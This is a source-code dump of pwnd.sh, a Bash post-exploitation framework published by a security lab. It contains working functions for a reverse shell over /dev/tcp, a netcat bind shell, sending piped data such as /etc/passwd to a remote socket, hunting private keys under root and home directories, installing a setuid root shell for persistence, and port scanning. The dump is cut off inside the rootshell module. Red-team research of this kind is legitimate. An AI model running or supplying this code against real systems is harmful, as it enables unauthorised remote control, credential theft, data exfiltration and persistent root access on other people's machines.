Repository: SafeBreach-Labs/pwndsh
Branch: master
Commit: 1239754a8dfd
Files: 12
Total size: 44.3 KB
Directory structure:
gitextract_ydkfa3ea/
├── LICENSE
├── README.rst
├── bin/
│ ├── compile_pwnd_sh.sh
│ └── pwnd.sh
└── pwnd/
├── _bootstrap.bash
├── _pwnd.bash
├── assets/
│ └── priv_keys.bash
├── c2/
│ ├── bindshell.bash
│ └── reverseshell.bash
├── exfiltration/
│ └── over_socket.bash
├── persistence/
│ └── rootshell.bash
└── reconnaissance/
└── portscanner.bash
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
Copyright (c) 2016, SafeBreach
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: README.rst
================================================
PWND.SH
=======
pwnd.sh is a post-exploitation framework (and an interactive shell) developed in Bash shell scripting. It aims to be cross-platform (Linux, Mac OS X, Solaris etc.) and with little to no external dependencies.
Slides from SkyDogCon 2016 are `available here <http://www.ikotler.org/JustGotPWND.pdf>`_
Install:
--------
.. code::
$ cd bin/
$ ./compile_pwnd_sh.sh
This will generate a file called ``pwnd.sh``
.. code::
$ ls -la pwnd.sh
-rw-r--r--@ 1 ikotler staff 7823 Oct 19 16:55 pwnd.sh
Now let's get pwnd!
.. code::
$ source pwnd.sh
Pwnd v1.0.0, Itzik Kotler (@itzikkotler)]
Type `help' to display all the pwnd commands.
Type `help name' to find out more about the pwnd command `name'.
(pwnd)$
Tested:
-------
* Mac OS X El Captian (10.11.3) using GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin15)
* Ubuntu 14.04.3 LTS using GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
* Oracle Solaris 11.3 X86 using GNU bash, version 4.1.17(1)-release (i386-pc-solaris2.11)
Features/Bugs:
--------------
Found a bug? Have a good idea for improving PWND.SH? Head over to `PWND.SH's github <https://github.com/safebreach-labs/pwndsh>`_ page and create a new ticket or fork. If you want to contact us please email: labs (at) safebreach (dot) com.
License:
--------
BSD 3-Clause
================================================
FILE: bin/compile_pwnd_sh.sh
================================================
#!/usr/bin/env bash
###########################################################################
# #
# Copyright (c) 2016, SafeBreach #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are #
# met: #
# #
# 1. Redistributions of source code must retain the above #
# copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the #
# above copyright notice, this list of conditions and the following #
# disclaimer in the documentation and/or other materials provided with #
# the distribution. #
# #
# 3. Neither the name of the copyright holder #
# nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written #
# permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #
# AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
###########################################################################
##########
# Consts #
##########
DEFAULT_OUTPUT_FILENAME="pwnd.sh"
#############
# Functions #
#############
normalize_and_append() {
grep -v "^#" < "$1" >> "$2"
echo " " >> "$2"
}
###############
# Entry Point #
###############
output_filename="$DEFAULT_OUTPUT_FILENAME"
if [ ! -z "${1-}" ]; then
output_filename="$1"
fi
# Start with a shebang line
echo "#!/usr/bin/env bash"> "$output_filename"
normalize_and_append "../pwnd/_pwnd.bash" "$output_filename"
for module in $(find ../pwnd -type f -name "[a-zA-Z0-9]*.bash"); do
normalize_and_append "$module" "$output_filename"
done
normalize_and_append "../pwnd/_bootstrap.bash" "$output_filename"
ls -la "$output_filename"
================================================
FILE: bin/pwnd.sh
================================================
#!/usr/bin/env bash
IFS=$' \t\n'
PWND_VERSION="1.0.0"
_pwnd_commands=()
pwnd_register_cmd() {
_pwnd_commands+=("$1;$2")
}
pwnd_isroot() {
local retval=0
if [ $EUID -ne 0 ]; then
echo "You must be a root user"
retval=1
fi
return $retval
}
__hunt_privkeys_usage() {
cat << "EOF"
usage: __hunt_privkeys [dir ...]
Find all private keys that are textaully encoded. Each DIR argument will be
recursively searched. Default directories are: `~root' and `dirname $HOME'
EOF
return 0
}
hunt_privkeys() {
local dirs
if [ $# -eq 0 ]; then
dirs=(~root "$(dirname $HOME)")
else
dirs=("$@")
fi
for directory in "${dirs[@]}"; do
echo "Scanning $directory ..."
grep -ril "PRIVATE KEY" "$directory" 2> /dev/null
done
echo "Done!"
}
pwnd_register_cmd hunt_privkeys "Find all private keys that are textually encoded"
__bindshell_usage() {
cat << "EOF"
usage: bindshell port [arg ...]
A simple yet "cross platform" implementation of bindshell using nc, mkfifo
and bash. PORT is a TCP (by default) port number. Each ARG will be passed
directly to nc
EOF
return 0
}
bindshell() {
if [ -z "${1-}" ]; then
__bindshell_usage
return 0
fi
local tempfile=$(mktemp -u)
local port="$1"
mkfifo "$tempfile"
bash -i 2>&1 < "$tempfile" | nc "${@:2}" -l "$port" > "$tempfile"
}
pwnd_register_cmd bindshell "A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo and bash"
__reverseshell_usage() {
cat << "EOF"
usage: reverseshell [-u] host port
A simple yet "cross platform" implementation of reverseshell using bash
sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default)
port number. The `-u' if specified says use UDP instead of the default option
of TCP.
EOF
return 0
}
reverseshell() {
local host proto port
if [ "${1-}" == "-u" ]; then
if [ -z "${3-}" ]; then
__reverseshell_usage
return 0
fi
host="$2"
proto="udp"
port="$3"
else
if [ -z "${2-}" ]; then
__reverseshell_usage
return 0
fi
proto="tcp"
port="$2"
host="$1"
fi
bash -i >& "/dev/$proto/$host/$port" 0>&1
}
pwnd_register_cmd reverseshell "A simple yet \"cross platform\" implementation of reverseshell using bash sockets"
__over_socket_usage() {
cat << "EOF"
usage: over_socket [-u] host port
A simple yet "cross platform" implementation of generic TCP and UDP socket
using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP
(by default) port number. The `-u' if specified says use UDP instead of
the default option of TCP.
Example:
$ cat /etc/passwd | over_socket localhost 80
This will open connection to localhost at port 80 TCP and will send over
the content of `/etc/passwd'
EOF
return 0
}
over_socket() {
local host proto port
if [ "${1-}" == "-u" ]; then
if [ -z "${3-}" ]; then
__over_socket_usage
return 0
fi
host="$2"
proto="udp"
port="$3"
else
if [ -z "${2-}" ]; then
__over_socket_usage
return 0
fi
proto="tcp"
port="$2"
host="$1"
fi
cat /dev/stdin > "/dev/$proto/$host/$port"
}
pwnd_register_cmd over_socket "A simple yet \"cross platform\" implementation of generic TCP and UDP socket using bash sockets"
__install_rootshell_usage() {
cat << "EOF"
usage: install_rootshell [/path/to/shell] [/path/to/rootshell]
A simple yet "cross platform" implementation of rootshell using chmod and
bash. /PATH/TO/SHELL is a path to shell (default: $SHELL). /PATH/TO/ROOTSHELL
is path to where to install the rootshell (default: mktemp -u)
EOF
return 0
}
install_rootshell() {
pwnd_isroot || return 1
local shellfile=${1-$SHELL}
local rootshell=${2-$(mktemp -u)}
cp "$shellfile" "$rootshell"
chmod u+s "$rootshell"
ls -la "$rootshell"
}
pwnd_register_cmd install_rootshell "A simple yet \"cross platform\" implementation of rootshell using \`chmod u+s' and bash"
__portscanner_usage() {
cat << "EOF"
usage: portscanner host [port/proto ...], [port-range/proto ...]>
A simple yet "cross platform" implementation of portscanner using bash
sockets. HOST can be IPv4 address or hostname. PORT can be any port number.
PROTO can be `tcp' or `udp'. PORTS is comma-seperated PORTs. PORT-RANGE is
any range between 1 to 65535 following `/tcp' or `/udp' postfix.
Examples:
$ portscanner localhost 80/tcp
This will check if TCP port 80 is open on localhost.
$ portscanner localhost 53/tcp,53/udp
This will check if TCP port 53 and UDP port 53 are opened on localhost.
$ portscanner localhost 1-1024/tcp,69/udp
This will check if TCP ports 1 to 1024 are opened and if UDP port 69
is opened on localhost.
EOF
return 0
}
__portscanner_timeout() {
# Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time
`perl -e 'alarm shift; open STDERR, "> /dev/null"; exec @ARGV' "$@"`
# `` works better than $() in Linux when it comes to supressing 'Alarm' message _AND_ still having alarm terminating the process
}
portscanner() {
if [ -z "${2-}" ]; then
__portscanner_usage
return
fi
local host="$1"
local ports=()
local csv_args=()
IFS=',' read -ra csv_args <<< "${@:2}"
for arg in "${csv_args[@]}"; do
case "$arg" in
*-*)
# i.e. 1-1024/tc
local range_ports=()
IFS='/' read -ra range_ports <<< "$arg"
IFS='-' read start end <<< "${range_ports[0]}"
for ((port=start; port <= end; port++)); do
ports+=("$port/${range_ports[1]}")
done
;;
*,*)
# i.e. '53/tcp, 53/udp'
IFS=',' read -ra ports <<< "$arg"
;;
*)
# i.e. '80/tcp'
ports+=("$arg")
;;
esac
done
for port in "${ports[@]}"; do
local conn_parameter=()
IFS='/' read -ra conn_parameter <<< "$port"
__portscanner_timeout 1 "echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}" &&
echo "port $port is open" ||
echo "port $port is closed"
done
}
pwnd_register_cmd portscanner "A simple yet \"cross platform\" implementation of TCP and UDP port scanner using bash sockets"
__bash_help_usage() {
echo "Execute bash builtin help and pass any argument to it"
}
bash_help() {
local help_topic=""
if [ ! -z "${1-}" ]; then
help_topic="$1"
fi
bash -c "help $help_topic"
}
__help_usage() {
cat << "EOF"
usage: pwnd-help <name>
Display helpful information about pwnd commands. If NAME is specified,
gives detailed help on command NAME, otherwise a list of the pwnd commands
is printed.
To access bash builtin help use: `bash_help'
EOF
return 0
}
help() {
if [ ! -z "${1-}" ]; then
eval "__$1_usage" 2> /dev/null
if [ $? == 127 ]; then
echo "pwnd-help: no help topics match \`$1'. Try \`help' to see all the defined commands"
return 127
fi
else
cat << EOF
pwnd, version ${PWND_VERSION} (${MACHTYPE})
These pwnd commands are defined internally. Type \`help' to see this list.
Type \`help name' to find out more about the pwnd command \`name'.
EOF
for pwnd_command in "${_pwnd_commands[@]-}"; do
IFS=';' read -ra pwnd_cmd_parameters <<< "$pwnd_command"
# IFS=';' pwnd_cmd_parameters=($pwnd_command)
printf "%-19s -- %s\n" "${pwnd_cmd_parameters[0]}" "${pwnd_cmd_parameters[1]}"
done
fi
}
cat << EOF
[Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]"
Type \`help' to display all the pwnd commands.
Type \`help name' to find out more about the pwnd command \`name'.
EOF
PS1="(\[\033[92m\]\[\033[1m\]pwnd\[\033[0m\]\[\033[39m\])${PS1-}"
================================================
FILE: pwnd/_bootstrap.bash
================================================
###########################################################################
# #
# Copyright (c) 2016, SafeBreach #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are #
# met: #
# #
# 1. Redistributions of source code must retain the above #
# copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the #
# above copyright notice, this list of conditions and the following #
# disclaimer in the documentation and/or other materials provided with #
# the distribution. #
# #
# 3. Neither the name of the copyright holder #
# nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written #
# permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #
# AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
###########################################################################
# _bootstrap.sh, interactive pwnd shell
__bash_help_usage() {
echo "Execute bash builtin help and pass any argument to it"
}
bash_help() {
local help_topic=""
if [ ! -z "${1-}" ]; then
help_topic="$1"
fi
bash -c "help $help_topic"
}
__help_usage() {
cat << "EOF"
usage: pwnd-help <name>
Display helpful information about pwnd commands. If NAME is specified,
gives detailed help on command NAME, otherwise a list of the pwnd commands
is printed.
To access bash builtin help use: `bash_help'
EOF
return 0
}
help() {
if [ ! -z "${1-}" ]; then
eval "__$1_usage" 2> /dev/null
if [ $? == 127 ]; then
echo "pwnd-help: no help topics match \`$1'. Try \`help' to see all the defined commands"
return 127
fi
else
cat << EOF
pwnd, version ${PWND_VERSION} (${MACHTYPE})
These pwnd commands are defined internally. Type \`help' to see this list.
Type \`help name' to find out more about the pwnd command \`name'.
EOF
for pwnd_command in "${_pwnd_commands[@]-}"; do
IFS=';' read -ra pwnd_cmd_parameters <<< "$pwnd_command"
# IFS=';' pwnd_cmd_parameters=($pwnd_command)
printf "%-19s -- %s\n" "${pwnd_cmd_parameters[0]}" "${pwnd_cmd_parameters[1]}"
done
fi
}
###############
# Entry Point #
###############
cat << EOF
[Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]"
Type \`help' to display all the pwnd commands.
Type \`help name' to find out more about the pwnd command \`name'.
EOF
PS1="(\[\033[92m\]\[\033[1m\]pwnd\[\033[0m\]\[\033[39m\])${PS1-}"
================================================
FILE: pwnd/_pwnd.bash
================================================
###########################################################################
# #
# Copyright (c) 2016, SafeBreach #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are #
# met: #
# #
# 1. Redistributions of source code must retain the above #
# copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the #
# above copyright notice, this list of conditions and the following #
# disclaimer in the documentation and/or other materials provided with #
# the distribution. #
# #
# 3. Neither the name of the copyright holder #
# nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written #
# permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #
# AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
###########################################################################
IFS=$' \t\n'
##########
# Consts #
##########
PWND_VERSION="1.0.0"
####################
# Global variables #
####################
_pwnd_commands=()
#############
# Functions #
#############
pwnd_register_cmd() {
_pwnd_commands+=("$1;$2")
}
pwnd_isroot() {
local retval=0
if [ $EUID -ne 0 ]; then
echo "You must be a root user"
retval=1
fi
return $retval
}
================================================
FILE: pwnd/assets/priv_keys.bash
================================================
###########################################################################
# #
# Copyright (c) 2016, SafeBreach #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are #
# met: #
# #
# 1. Redistributions of source code must retain the above #
# copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the #
# above copyright notice, this list of conditions and the following #
# disclaimer in the documentation and/or other materials provided with #
# the distribution. #
# #
# 3. Neither the name of the copyright holder #
# nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written #
# permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #
# AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
###########################################################################
# priv_keys, Find all private keys that are textually encoded
__hunt_privkeys_usage() {
cat << "EOF"
usage: __hunt_privkeys [dir ...]
Find all private keys that are textaully encoded. Each DIR argument will be
recursively searched. Default directories are: `~root' and `dirname $HOME'
EOF
return 0
}
hunt_privkeys() {
local dirs
if [ $# -eq 0 ]; then
dirs=(~root "$(dirname $HOME)")
else
dirs=("$@")
fi
for directory in "${dirs[@]}"; do
echo "Scanning $directory ..."
grep -ril "PRIVATE KEY" "$directory" 2> /dev/null
done
echo "Done!"
}
pwnd_register_cmd hunt_privkeys "Find all private keys that are textually encoded"
================================================
FILE: pwnd/c2/bindshell.bash
================================================
###########################################################################
# #
# Copyright (c) 2016, SafeBreach #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are #
# met: #
# #
# 1. Redistributions of source code must retain the above #
# copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the #
# above copyright notice, this list of conditions and the following #
# disclaimer in the documentation and/or other materials provided with #
# the distribution. #
# #
# 3. Neither the name of the copyright holder #
# nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written #
# permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #
# AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
###########################################################################
# bindshell, A simple yet "cross platform" implementation of bindshell using nc, mkfifo and /bin/bash
__bindshell_usage() {
cat << "EOF"
usage: bindshell port [arg ...]
A simple yet "cross platform" implementation of bindshell using nc, mkfifo
and bash. PORT is a TCP (by default) port number. Each ARG will be passed
directly to nc
EOF
return 0
}
bindshell() {
if [ -z "${1-}" ]; then
__bindshell_usage
return 0
fi
local tempfile=$(mktemp -u)
local port="$1"
mkfifo "$tempfile"
bash -i 2>&1 < "$tempfile" | nc "${@:2}" -l "$port" > "$tempfile"
}
pwnd_register_cmd bindshell "A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo and bash"
================================================
FILE: pwnd/c2/reverseshell.bash
================================================
###########################################################################
# #
# Copyright (c) 2016, SafeBreach #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are #
# met: #
# #
# 1. Redistributions of source code must retain the above #
# copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the #
# above copyright notice, this list of conditions and the following #
# disclaimer in the documentation and/or other materials provided with #
# the distribution. #
# #
# 3. Neither the name of the copyright holder #
# nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written #
# permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #
# AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
###########################################################################
# reverseshell, A simple yet "cross platform" implementation of reverseshell using bash sockets
__reverseshell_usage() {
cat << "EOF"
usage: reverseshell [-u] host port
A simple yet "cross platform" implementation of reverseshell using bash
sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default)
port number. The `-u' if specified says use UDP instead of the default option
of TCP.
EOF
return 0
}
reverseshell() {
local host proto port
if [ "${1-}" == "-u" ]; then
if [ -z "${3-}" ]; then
__reverseshell_usage
return 0
fi
host="$2"
proto="udp"
port="$3"
else
if [ -z "${2-}" ]; then
__reverseshell_usage
return 0
fi
proto="tcp"
port="$2"
host="$1"
fi
bash -i >& "/dev/$proto/$host/$port" 0>&1
}
pwnd_register_cmd reverseshell "A simple yet \"cross platform\" implementation of reverseshell using bash sockets"
================================================
FILE: pwnd/exfiltration/over_socket.bash
================================================
###########################################################################
# #
# Copyright (c) 2016, SafeBreach #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are #
# met: #
# #
# 1. Redistributions of source code must retain the above #
# copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the #
# above copyright notice, this list of conditions and the following #
# disclaimer in the documentation and/or other materials provided with #
# the distribution. #
# #
# 3. Neither the name of the copyright holder #
# nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written #
# permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #
# AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
###########################################################################
# over_socket, A simple yet "cross platform" implementation of generic TCP and UDP socket using bash sockets
__over_socket_usage() {
cat << "EOF"
usage: over_socket [-u] host port
A simple yet "cross platform" implementation of generic TCP and UDP socket
using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP
(by default) port number. The `-u' if specified says use UDP instead of
the default option of TCP.
Example:
$ cat /etc/passwd | over_socket localhost 80
This will open connection to localhost at port 80 TCP and will send over
the content of `/etc/passwd'
EOF
return 0
}
over_socket() {
local host proto port
if [ "${1-}" == "-u" ]; then
if [ -z "${3-}" ]; then
__over_socket_usage
return 0
fi
host="$2"
proto="udp"
port="$3"
else
if [ -z "${2-}" ]; then
__over_socket_usage
return 0
fi
proto="tcp"
port="$2"
host="$1"
fi
cat /dev/stdin > "/dev/$proto/$host/$port"
}
pwnd_register_cmd over_socket "A simple yet \"cross platform\" implementation of generic TCP and UDP socket using bash sockets"
================================================
FILE: pwnd/persistence/rootshell.bash
================================================
###########################################################################
# #
# Copyright (c) 2016, SafeBreach #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are #
# met: #
# #
# 1. Redistributions of source code must retain the above #
# copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the #
# above copyright notice, this list of conditions and the following #
# disclaimer in the documentation and/or other materials provided with #
# the distribution. #
# #
# 3. Neither the name of the copyright holder #
# nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written #
# permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #
# AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
###########################################################################
# rootshell, A simple yet "cross platform" implementation of rootshell using `chmod u+s' and bash
__install_rootshell_usage() {
cat << "EOF"
usage: install_rootshell [/path/to/shell] [/path/to/rootshell]
A simple yet "cross platform" implementation of rootshell using chmod and
